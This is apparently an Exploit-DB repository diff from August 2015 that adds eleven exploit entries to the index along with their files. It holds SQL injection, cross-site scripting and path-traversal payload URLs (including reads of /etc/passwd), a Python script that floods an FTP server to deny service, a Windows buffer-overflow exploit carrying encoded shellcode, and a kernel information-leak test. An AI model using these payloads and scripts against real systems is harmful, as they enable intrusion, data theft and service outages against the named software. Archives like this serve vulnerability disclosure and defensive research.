DB: 2015-08-23

11 new exploits

files.csv

@@ -34121,6 +34121,9 @@ id,file,description,date,author,platform,type,port
 37793,platforms/android/remote/37793.txt,"Google Chrome for Android Multiple file:: URL Handler Local Downloaded Content Disclosure",2012-09-12,"Artem Chaykin",android,remote,0
 37794,platforms/android/remote/37794.txt,"Google Chrome for Android Local Application Handling Cookie Theft Weakness",2012-09-12,"Artem Chaykin",android,remote,0
 37795,platforms/android/remote/37795.txt,"Google Chrome for Android Same-origin Policy Bypass Local Symlink Weakness",2012-09-12,"Artem Chaykin",android,remote,0
+37940,platforms/php/webapps/37940.txt,"SenseSites CommonSense CMS cat2.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0
+37941,platforms/php/webapps/37941.txt,"SenseSites CommonSense CMS special.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0
+37942,platforms/php/webapps/37942.txt,"SenseSites CommonSense CMS article.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0
 37798,platforms/windows/dos/37798.py,"XMPlay 3.8.1.12 - .pls Local Crash PoC",2015-08-17,St0rn,windows,dos,0
 37799,platforms/windows/local/37799.py,"MASM321 11 Quick Editor (.qeditor) 4.0g- .qse SEH Based Buffer Overflow (ASLR & SAFESEH bypass)",2015-08-17,St0rn,windows,local,0
 37800,platforms/windows/remote/37800.php,"Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064)",2015-08-17,"Mohammad Reza Espargham",windows,remote,0
@@ -34148,6 +34151,9 @@ id,file,description,date,author,platform,type,port
 37828,platforms/php/webapps/37828.txt,"Poweradmin 'index.php' Cross Site Scripting Vulnerability",2012-09-20,Siavash,php,webapps,0
 37829,platforms/php/webapps/37829.txt,"WordPress MF Gig Calendar Plugin Cross Site Scripting Vulnerability",2012-09-20,"Chris Cooper",php,webapps,0
 37830,platforms/cgi/webapps/37830.txt,"ZEN Load Balancer Multiple Security Vulnerabilities",2012-09-24,"Brendan Coles",cgi,webapps,0
+37937,platforms/linux/local/37937.c,"Linux Kernel 3.2.x 'uname()' System Call Local Information Disclosure Vulnerability",2012-10-09,"Brad Spengler",linux,local,0
+37938,platforms/php/webapps/37938.txt,"OpenX /www/admin/plugin-index.php parent Parameter XSS",2012-10-10,"High-Tech Bridge",php,webapps,0
+37939,platforms/php/webapps/37939.txt,"FileContral Local File Include and Local File Disclosure Vulnerabilities",2012-08-11,"Ashiyane Digital Security Team",php,webapps,0
 37833,platforms/php/webapps/37833.txt,"YCommerce Multiple SQL Injection Vulnerabilities",2012-09-21,"Ricardo Almeida",php,webapps,0
 37834,platforms/linux/remote/37834.py,"Samba 3.5.11/3.6.3 Unspecified Remote Code Execution Vulnerability",2012-09-24,kb,linux,remote,0
 37835,platforms/php/webapps/37835.html,"WordPress Cross Site Request Forgery Vulnerability",2012-09-22,AkaStep,php,webapps,0
@@ -34205,6 +34211,7 @@ id,file,description,date,author,platform,type,port
 37887,platforms/php/webapps/37887.txt,"up.time 7.5.0 Arbitrary File Disclose And Delete Exploit",2015-08-19,LiquidWorm,php,webapps,9999
 37888,platforms/php/webapps/37888.txt,"up.time 7.5.0 Upload And Execute File Exploit",2015-08-19,LiquidWorm,php,webapps,9999
 37889,platforms/linux/remote/37889.txt,"YingZhiPython Directory Traversal and Arbitrary File Upload Vulnerabilities",2012-09-26,"Larry Cashdollar",linux,remote,0
+37890,platforms/windows/local/37890.py,"Multiple ChiefPDF Software 2.0 - Buffer Overflow",2015-08-20,metacom,windows,local,0
 37891,platforms/xml/webapps/37891.txt,"Aruba Mobility Controller 6.4.2.8 - Multiple vulnerabilities",2015-08-20,"Itzik Chen",xml,webapps,4343
 37892,platforms/asp/webapps/37892.txt,"Vifi Radio v1 - CSRF Vulnerability",2015-08-20,KnocKout,asp,webapps,80
 37893,platforms/windows/dos/37893.py,"Valhala Honeypot 1.8 - Stack-Based Buffer Overflow",2015-08-20,"_ Un_N0n _",windows,dos,21
@@ -34221,6 +34228,7 @@ id,file,description,date,author,platform,type,port
 37904,platforms/php/webapps/37904.txt,"Omnistar Mailer Multiple SQL Injection and HTML Injection Vulnerabilities",2012-10-01,"Vulnerability Laboratory",php,webapps,0
 37905,platforms/windows/dos/37905.rb,"PowerTCP WebServer for ActiveX Denial of Service Vulnerability",2012-09-28,catatonicprime,windows,dos,0
 37907,platforms/php/webapps/37907.txt,"WordPress MDC Private Message Plugin 1.0.0 - Persistent XSS",2015-08-21,"Chris Kellum",php,webapps,80
+37908,platforms/windows/dos/37908.py,"Konica Minolta FTP Utility 1.0 - Remote DoS PoC",2015-08-21,"Shankar Damodaran",windows,dos,21
 37909,platforms/windows/dos/37909.txt,"Microsoft Office 2007 wwlib.dll fcPlcfFldMom Uninitialized Heap Usage",2015-08-21,"Google Security Research",windows,dos,0
 37910,platforms/windows/dos/37910.txt,"Microsoft Office 2007 wwlib.dll Type Confusion",2015-08-21,"Google Security Research",windows,dos,0
 37911,platforms/windows/dos/37911.txt,"Microsoft Office 2007 OGL.dll DpOutputSpanStretch::OutputSpan Out of Bounds Write",2015-08-21,"Google Security Research",windows,dos,0
@@ -34245,3 +34253,6 @@ id,file,description,date,author,platform,type,port
 37930,platforms/php/webapps/37930.txt,"Netsweeper 4.0.9 - Arbitrary File Upload And Execution",2015-08-21,"Anastasios Monachos",php,webapps,0
 37931,platforms/php/webapps/37931.txt,"Netsweeper 3.0.6 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0
 37932,platforms/php/webapps/37932.txt,"Netsweeper 4.0.8 - Arbitrary File Upload and Execution",2015-08-21,"Anastasios Monachos",php,webapps,0
+37934,platforms/php/webapps/37934.txt,"WordPress Shopp Plugin Multiple Security Vulnerabilities",2012-10-05,T0x!c,php,webapps,0
+37935,platforms/php/webapps/37935.txt,"Interspire Email Marketer Cross Site Scripting_ HTML Injection_ and SQL Injection Vulnerabilities",2012-10-08,"Ibrahim El-Sayed",php,webapps,0
+37936,platforms/php/webapps/37936.txt,"Open Realty 'select_users_lang' Parameter Local File Include Vulnerability",2012-10-06,L0n3ly-H34rT,php,webapps,0

platforms/linux/local/37937.c

@@ -0,0 +1,68 @@
+source: http://www.securityfocus.com/bid/55855/info
+
+The Linux kernel is prone to a local information-disclosure vulnerability.
+
+Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks. 
+
+/* Test for UNAME26 personality uname kernel stack leak.
+ * Copyright 2012, Kees Cook <keescook@chromium.org>
+ * License: GPLv3
+ */
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <errno.h>
+#include <unistd.h>
+#include <sys/personality.h>
+#include <sys/utsname.h>
+
+#define UNAME26 0x0020000
+
+int dump_uts(void)
+{
+	int i, leaked = 0;
+	struct utsname buf = { };
+
+	if (uname(&buf)) {
+		perror("uname");
+		exit(1);
+	}
+	printf("%s\n", buf.release);
+
+	for (i = strlen(buf.release) + 1; i < sizeof(buf.release); i++) {
+		unsigned char c = (unsigned char)buf.release[i];
+
+		printf("%02x", c);
+		if (c)
+			leaked = 1;
+	}
+	printf("\n");
+
+	return leaked ? (i - (strlen(buf.release) + 1)) : 0;
+}
+
+int main(int ac, char **av)
+{
+	int leaked;
+
+	leaked = dump_uts();
+	if (leaked) {
+		printf("Leaked %d bytes even without UNAME26!?\n", leaked);
+		return 1;
+	}
+
+
+	if (personality(PER_LINUX | UNAME26) < 0) {
+		perror("personality");
+		exit(1);
+	}
+
+	leaked = dump_uts();
+	if (leaked) {
+		printf("Leaked %d bytes!\n", leaked);
+		return 1;
+	} else {
+		printf("Seems safe.\n");
+		return 0;
+	}
+}

platforms/php/webapps/37934.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/55817/info
+
+The Shopp plugin for WordPress is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Attackers can exploit these issues to disclose sensitive information, steal cookie information, execute arbitrary client side script code in the context of browser, upload and execute arbitrary files in the context of the web server, and launch other attacks.
+
+Shopp 1.0.17 is vulnerable; other versions may also be affected.
+
+http://www.example.com/Shopp_v1.0.17/core/ui/behaviors/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert("xSS");//
+http://www.example.com/Shopp_v1.0.17/core/ui/behaviors/swfupload/swfupload.swf
+http://www.example.com/Shopp_v1.0.17/core/model/schema.sql 

platforms/php/webapps/37935.txt

@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/55829/info
+
+Interspire Email Marketer is prone to the following input-validation vulnerabilities because it fails to properly sanitize user-supplied input:
+
+1. An SQL injection vulnerabilities
+2. Multiple HTML injection vulnerabilities
+3. A cross-site scripting vulnerability
+
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Email Marketer 6.0.1 is vulnerable; other versions may be affected. 
+
+http://www.example.com/admin/index.php?Page=Addons&Addon=dynamiccontenttags&; Action=Edit&id=-1%27+UNION+Select+1,2,3,4--%20- [SQLi]
+
+http://www.example.com/admin/index.php?Page=Addons&Addon=dynamiccontenttags&; Action=Edit&id=-1%27+UNION+Select+1,version%28%29,3,4--%20-[SQLi]
+
+http://www.example.com/admin/index.php?Page=Addons&Addon=
+dynamiccontenttags&Action=%3E%22%3Ciframe%20src=http://www.vulnerability-lab.com%20onload=alert%28%22VL%22%29%3C/iframe%3E [XSS] 

platforms/php/webapps/37936.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55834/info
+
+Open Realty is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+Open Realty 2.5.6 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/open-realty2.5.6/index.php?select_users_lang=../../../../../../../boot.ini%00 

platforms/php/webapps/37938.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55860/info
+
+OpenX is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+OpenX 2.8.10 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/www/admin/plugin-index.php?action=info&group=vastInlineBannerTypeHtml&parent=%22%3E%3C script%3Ealert%28document.cookie%29;%3C/script%3E [XSS] 

platforms/php/webapps/37939.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/55891/info
+
+FileContral is prone to a local file-include and a local file-disclosure vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these issues to view and execute local files within the context of the webserver process, obtaining potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
+
+FileContral 1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/Administrator/filemanager/filemanager.php?downfile=../../../../../etc/passwd
+http://www.example.com/Administrator/filemanager/filemanager.php?downfile=../../../../../../etc/passwd
+http://www.example.com/Administrator/filemanager/filemanager.php?downfile=server dir/public_html/lists/config/config.php 

platforms/php/webapps/37940.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/55893/info
+
+CommonSense CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/cat2.php?id=1 [SQL Injection] 

platforms/php/webapps/37941.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/55893/info
+ 
+CommonSense CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+ 
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+ http://www.example.com/special.php?id=1 [SQL Injection] 

platforms/php/webapps/37942.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/55893/info
+  
+CommonSense CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+  
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+  
+http://www.example.com/article.php?id=5 [SQL Injection] 

platforms/windows/dos/37908.py

@@ -0,0 +1,33 @@
+#!/usr/bin/python
+# Exploit Title: Konica Minolta FTP Utility 1.0 Remote DoS PoC
+# Date: 21-08-2015
+# Exploit Author: Shankar Damodaran
+# Vendor Homepage: http://www.konicaminolta.com/
+# Software Link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
+# Version: 1.0
+# Tested on: Microsoft Windows XP Professional SP3 English
+
+
+import socket
+
+# The ip address of the remote host
+ftphost = '192.168.1.7'
+# The port of the remote host
+ftpport = 21
+
+# Fuzzed packet of a certain length, Appending this to the USER command and requesting the remote ftp server denies requests for other legitimate users. 
+crafted_user_name= "B" * 450012   # DoS
+
+# Establishing connection
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect((ftphost,ftpport))
+s.recv(1024)
+
+# Sending the evil input.
+s.send('USER' + crafted_user_name +'\r\n')
+
+# Once the packet has been sent, the DoS will occur on the remote FTP server. By sending an interrupt through (Ctrl+C), will resume the FTP server from DoS. (Note : The FTP server will not get crashed)
+s.send('QUIT \r\n')	
+s.close()
+
+# End of PoC - Shankar Damodaran

platforms/windows/local/37890.py

@@ -0,0 +1,35 @@
+#!/usr/bin/python
+#Exploit Title:ChiefPDF Software Buffer Overflow 
+#vulnerable programs:
+#PDF to Image Converter 2.0
+#PDF to Image Converter Free 2.0
+#PDF to Tiff Converter 2.0
+#PDF to Tiff Converter Free 2.0
+#Software Link:http://www.soft32.com/publishers/chiefpdf/
+#Author: metacom - twitter.com/m3tac0m
+#Tested on: Win-Xp-sp3, Win-7, Win-8.1
+
+#How to use:Copy the AAAA...string from regkey.txt and paste->Registration - License Name: 
+buffer="A" * 544
+buffer+="\xeb\x06\x90\x90"
+buffer+="\x8B\x89\x03\x10"# 1003898B   5E   POP ESI 
+buffer+="\x90" * 80
+buffer+=("\xba\x50\x3e\xf5\xa5\xda\xd7\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
+"\x33\x83\xc3\x04\x31\x53\x0e\x03\x03\x30\x17\x50\x5f\xa4\x5e"
+"\x9b\x9f\x35\x01\x15\x7a\x04\x13\x41\x0f\x35\xa3\x01\x5d\xb6"
+"\x48\x47\x75\x4d\x3c\x40\x7a\xe6\x8b\xb6\xb5\xf7\x3d\x77\x19"
+"\x3b\x5f\x0b\x63\x68\xbf\x32\xac\x7d\xbe\x73\xd0\x8e\x92\x2c"
+"\x9f\x3d\x03\x58\xdd\xfd\x22\x8e\x6a\xbd\x5c\xab\xac\x4a\xd7"
+"\xb2\xfc\xe3\x6c\xfc\xe4\x88\x2b\xdd\x15\x5c\x28\x21\x5c\xe9"
+"\x9b\xd1\x5f\x3b\xd2\x1a\x6e\x03\xb9\x24\x5f\x8e\xc3\x61\x67"
+"\x71\xb6\x99\x94\x0c\xc1\x59\xe7\xca\x44\x7c\x4f\x98\xff\xa4"
+"\x6e\x4d\x99\x2f\x7c\x3a\xed\x68\x60\xbd\x22\x03\x9c\x36\xc5"
+"\xc4\x15\x0c\xe2\xc0\x7e\xd6\x8b\x51\xda\xb9\xb4\x82\x82\x66"
+"\x11\xc8\x20\x72\x23\x93\x2e\x85\xa1\xa9\x17\x85\xb9\xb1\x37"
+"\xee\x88\x3a\xd8\x69\x15\xe9\x9d\x86\x5f\xb0\xb7\x0e\x06\x20"
+"\x8a\x52\xb9\x9e\xc8\x6a\x3a\x2b\xb0\x88\x22\x5e\xb5\xd5\xe4"
+"\xb2\xc7\x46\x81\xb4\x74\x66\x80\xd6\x1b\xf4\x48\x37\xbe\x7c"
+"\xea\x47")
+file = open('regkey.txt','wb')
+file.write(buffer);
+file.close()